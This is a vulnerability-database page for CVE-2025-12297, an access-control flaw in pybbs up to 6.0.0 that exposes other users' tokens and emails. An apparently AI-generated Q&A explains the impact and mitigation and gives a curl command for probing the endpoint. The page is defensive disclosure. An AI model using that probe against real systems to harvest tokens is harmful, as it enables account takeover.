CVE-2025-12297
BaseFortify
Publication date: 2025-10-27
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| pybbs_project | pybbs | to 6.0.0 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
| CWE-200 | The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
| CWE-NVD-CWE-noinfo |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-12297 is an information disclosure vulnerability in the atjiu pybbs software up to version 6.0.0. It exists in the UserApiController.java file, specifically in the GET /api/user/{username} endpoint. This flaw allows any authenticated user to access sensitive information such as tokens and email addresses of other users by specifying their usernames. This improper control of resource identifiers enables attackers to retrieve another user's token and potentially impersonate them. The vulnerability can be exploited remotely and a public proof-of-concept exploit is available. [2, 3]
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized disclosure of sensitive user information, including authentication tokens and email addresses. An attacker who is authenticated can exploit this flaw to obtain another user's token, allowing them to impersonate that user and potentially gain unauthorized access to their account and data. This compromises user privacy and security, increasing the risk of account takeover and further malicious activities within the affected system. [2, 3]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability results in unauthorized disclosure of sensitive personal information such as email addresses and authentication tokens, which can violate confidentiality requirements under regulations like GDPR and HIPAA. Such information disclosure incidents may lead to non-compliance with data protection standards that mandate safeguarding personal data against unauthorized access. Organizations using the affected software could face legal and regulatory consequences if this vulnerability is exploited and personal data is compromised. [2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring or testing access to the GET /api/user/{username} endpoint in pybbs versions up to 6.0.0. Specifically, an authenticated user can attempt to access this endpoint with different usernames to see if sensitive information such as tokens and email addresses are disclosed improperly. Commands using curl or similar HTTP clients can be used to test this, for example: curl -i -H "Authorization: Bearer <valid_token>" https://<target>/api/user/<username>. If the response contains sensitive user tokens or emails for usernames other than the authenticated user, the vulnerability is present. [2]
What immediate steps should I take to mitigate this vulnerability?
No known countermeasures or mitigations have been identified for this vulnerability. The suggested immediate step is to replace the affected pybbs product (versions up to 6.0.0) with an alternative that is not vulnerable. Additionally, restricting access to the vulnerable endpoint to only authorized users and monitoring for suspicious access patterns may help reduce risk until a fix or patch is available. [3]